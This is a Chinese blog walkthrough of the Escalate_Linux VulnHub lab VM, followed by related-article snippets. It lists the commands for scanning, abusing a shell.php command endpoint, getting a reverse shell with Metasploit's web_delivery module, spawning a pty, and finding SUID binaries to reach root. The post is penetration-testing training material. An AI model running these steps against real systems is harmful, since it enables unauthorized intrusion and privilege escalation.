Escalate_Linux靶机提权渗透测试

最新推荐文章于 2025-02-24 10:39:32 发布
最新推荐文章于 2025-02-24 10:39:32 发布
阅读量881 收藏 6
点赞数
文章标签: 安全 网络 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xyc_0/article/details/129442883
版权

  • 靶机简介:Escalate_Linux - 有意开发的易受攻击的 Linux 虚拟机。这台机器的主要重点是学习Linux 利用后(权限提升)技术

一、信息收集

扫描局域网内存活的主机

nmap -sP 192.168.43.0/24

发现靶机开启http服务,我们尝试进入一下

进入发现默认Apache界面,我们扫描一下网站后台php文件

dirb http://192.168.43.229/ -X .php

发现网站后台有一个shell.php文件,我们进入一下

提示使用一下cmd命令

二、渗透测试

1.打开msfconsole漏洞测试平台

2.搜索web_delivery漏洞攻击模块

search web_delivery

3.使用exploit/multi/script/web_delivery模块

use exploit/multi/script/web_delivery

4.查看需配置的参数

show options

5.我们将目标地址和本地地址都设为攻击机IP,进行反弹shell

6.运行

run

我们将这段代码放进burpsuite 中进行url编码

复制出下面的编码放进网站url中执行

sessions -i 1

成功拿到shell,我们现在是user用户尝试提权为root

我们使用python实现交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

查找执行SUID命令

find / -perm -u=s -type f 2>/dev/null

发现user3下有个shell,我们运行测试一下

提权成功

Attach_1
关注
靶机渗透】Escalate_Linux靶机渗透练习+12种方式
serendipity1130的博客
08-31 5202
注:这个靶机主要用来练习Linux,有超过12种的方法 1.主机发现:arp-scan -l,发现靶机ip为192.168.225.149,并进行访问 2.扫描端口,开启了80,22端口 nmap -n -p- -A 192.168.225.149 -o escalate.nmap 3.发现是默认的apache页面,那么爆破php后缀的路径,发现shell.php的页面,进行访问: dirb http://192.168.225.149 -X .php 4.示:
TryHackMe | Blue Writeup (超干货详细msf渗透使用指南)
qq_25755011的博客
02-04 7191
因为给师弟师妹布置了这个任务作为假期渗透作业,是个对ms17_010漏洞利用的学习,而且网上中文的writeup很少(好像直接没有),所以写一篇Writeup记录一下。刚好也是一个相对完整的msf使用介绍,如有错误的地方欢迎各位师傅讨论指出 tryhackme是个很好的外网网络攻防学习平台,不用VPN也可以正常使用只是稍微有点卡,各位师傅有兴趣也可以去玩一玩。这里把这题的题目链接放给大家 TryHackMe | Blue 前期准备 kali Linux (仅用到msf框架与nmap) openvpn与.
Escalate_Linux靶机
dingxingaq的博客
12-24 1619
集合了多种liunx方法的靶场,通过该靶场可以简单的了解liunx方法1,扫描一下端口111/tcp open rpc 2049/udp nfs要知道对方的共享才能挂载SMB是一个协议名,全称是Server Message Block(服务器消息快协议),用于在计算机间共享文件、打印机、串口等,电脑上的网上邻居由它实现。一般共享文件夹和打印机使用较多 它是应用层(和表示层)协议,使用C/S架构。
Escalate_Linux: 1靶场渗透测试
最新发布
sucker的博客
02-24 1020
Web Delivery是Metasploit框架中的一个多功能模块,主要用于通过Web服务器传递Payload,触发目标执行恶意代码,从而建立反向连接。与传统Exploit模块不同,Web Delivery不直接利用服务端漏洞,而是通过传递轻量级代码建立会话,更适合在受限环境中维持访问。:Web Delivery是一种灵活的攻击方式,结合社会工程与漏洞利用,能有效穿透多层防御。9,在网站/shell.php下执行攻击语句之后,成功的创建出一个会话,进入这个会话中,拿到靶场的原始shell。
escalate靶机为例学习linux方式-linux学习笔记(1)
zr1213159840的博客
06-25 3164
linux11种方式总结
Linux升-Escalate_Linux
2302_78903258的博客
08-12 1737
1.切换至user4,发现root的组里面有user4和user7,意思是user4和user7可以修改/etc/passwd文件,那么的方式跟方法五是一样的,直接添加uid为0的用户即可。1.继续根据枚举的信息,确认user7是gid为0的组成员,使用和方法3相同的办法进入user7,切换至user7,发现user7属于gid为0的组。2)进入user5目录,执行发现和ls命令一样的结果,这是因为这个脚本是使用root限执行ls命令,所以这里可以通过全局环境变量
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6826
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
MSF后渗透
wo41ge的博客
11-24 3902
信息收集 获取目标机器的分区情况: post/windwos/gather/forensics/enum_drives 判断是否为虚拟机 post/windows/gather/checkvm 开启了哪些服务 :post/windwos/gather/enum_services 安装了哪些应用: post/windows/gather/enum_applications 查看共享: post/windows/gather/enum_shares 获取主机最近的系统操作: post/windows/gathe
MSF的利用
weixin_43570648的博客
04-18 1015
其实MSF大部分都用来用ms17_010,其实MSF还有很多功能,比如用他来打打CMS的exp呀,还有对端口的攻击,生成payload,在此,我也记一个笔记,供大家分享。 1.首先基于MSF的资产收集 网络主机收集: use auxiliary/scanner/discovery/udp_probe use auxiliary/scanner/discovery/udp_sweep use au...
Escalate_Linux靶机详解(1)
苏生要努力
02-21 659
name=xiao&pwd=123456如果你的value字符串中包含了=或者&,那么势必会造成接收U川的服务器解析错误,因此必须将引起歧义的&和=符号进行转义,也就是对其进行编码。背景:目标系统存在远程文件包含漏洞或者命令注入漏洞,想在目标设备上加载webshell,. 但不想在目标设备硬盘上留下任何webshell文件信息 (2)利用nc或python的方法反弹shell不好使用 解决思路:让目标设备从远端服务器加载webshell代码至内存执行。获得meterpreter。使用BP进行url编码。
渗透测试新手练习及高手深入挖掘专用Linux及Windows靶机(官方原版镜像)
05-08
本人学习时使用的的这两个系统,常见的高风险漏洞较多,容易利用,适合新手练习。 metasploitable-linux为常用的Linux靶机,系统包含了很多高风险漏洞、弱口令及容易利用的端口、服务,是渗透测试初学者练习技术的不二之选。 Windows_xp_pro_with_sp2就更不用说了,都被人挖烂了,sp2版本相比sp3更简单一些,适合新手练习。
HTB靶场系列 linux靶机 Nineveh靶机
m0_57221101的博客
01-17 4666
勘探 nmap勘探 nmap -sC -sV 10.10.10.43 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-26 16:22 CST Nmap scan report for 10.10.10.43 Host is up (0.36s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http
Kali Linux Web渗透测试手册(第二版) - 1.3 - 靶机的安装
weixin_30340617的博客
06-22 646
Kali Linux Web渗透测试手册(第二版) - 1.3 - 靶机的安装 一.配置KALI Linux渗透测试环境 在这一章,我们将覆盖以下内容: 在Windows和Linux上安装VirtualBox 创建一个Kali Linux虚拟机 更新和升级Kali Linux渗透测试配置web浏览器(即在Firefox浏览器下安装一些常用的插件) 创建一个属于...
No.40-VulnHub-Escalate_Linux: 1-Walkthrough渗透学习
qq_34801745的博客
02-02 1817
** VulnHub-Escalate_Linux: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/escalate_linux-1,323/ 靶机难度:中级(CTF) 靶机发布日期:2019年6月30日 靶机描述: Escalate_Linux-一种有意开发的易受攻击的Linux虚拟机。该计算机的主要重点是学习Linux Post Exp...
raven靶机实战(linux-udf)-vuluhub系列(四)
PANDA墨森的博客
06-28 1086
这是vulnhub靶机系列文章的第四篇,本次的靶机感觉还是挺有趣的,学到的重要知识点为linux下-mysql的udf以及某cms的漏洞getshell,开始吧... 靶机下载链接:https://download.vulnhub.com/raven/Raven2.ova 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13189038.html #001 环境搭建(nat) 攻击机kali:192.168.136.129 靶机Raven2:192.168.
[VulnHub靶机]Lin.Security_linux
qq_45927819的博客
03-15 2549
靶机描述 在in.security,我们希望开发一个Linux虚拟机,该虚拟机在编写本文时基于最新的Ubuntu发行版(18.04 LTS),但存在许多漏洞,这些漏洞使用户无法升级扎根在盒子上。旨在帮助理解某些内置应用程序和服务(如果配置错误)可能会被攻击者滥用。 首先,您可以使用以下凭据登录主机:bob / secret 下载地址:https://in.security/downloads/lin.security_v1.0.ova 靶机IP:192.168.56.106 直接ssh连接: ssh bob
运用Kali Linux靶机进行简单(计划任务、sudo滥用和Python建立反弹shell连接)
Xinghaoyang666的博客
08-02 1572
本篇文章仅具有教学意义,测试环境为内网虚拟机(Kali Linux)对靶机(DarkHole2)渗透,如有不法分子使用此文章的内容命令对公网进行渗透,与本文章作者无关,如有发现,请及时举报。
Vulnhub靶机实战Linux内核合集(Potato、jangow01)
Aukum的博客
05-27 1151
Potato和jangow01两个靶场的渗透测试实战。涉及ssh爆破登录,Linux系统内核
OCaml实现纯函数式DEFLATE算法库escalate
资源摘要信息:"escalate:纯OCaml中Deflate算法的实现" Deflate算法是一种广泛应用于数据压缩的算法,它结合了LZ77算法的无损压缩技术和霍夫曼编码的字典编码技术。在互联网上,Deflate算法以zlib、GZIP和PNG等格式...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值